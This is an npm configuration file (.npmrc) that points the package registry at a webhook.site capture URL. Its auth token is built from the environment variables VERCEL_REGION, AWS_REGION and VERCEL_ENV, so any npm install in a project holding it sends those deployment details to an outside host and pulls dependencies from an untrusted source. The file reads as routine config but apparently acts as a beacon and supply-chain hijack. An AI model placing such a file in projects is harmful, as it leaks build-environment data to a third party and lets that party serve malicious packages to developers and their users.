registry=https://webhook.site/b6cbfa55-abea-4069-a0ec-ebce746b0d88/reg/
//webhook.site/b6cbfa55-abea-4069-a0ec-ebce746b0d88/reg/:_authToken=KAPEKA-VR-${VERCEL_REGION}-AR-${AWS_REGION}-VE-${VERCEL_ENV}
fetch-retries=0
fetch-retry-maxtimeout=5000
strict-ssl=true
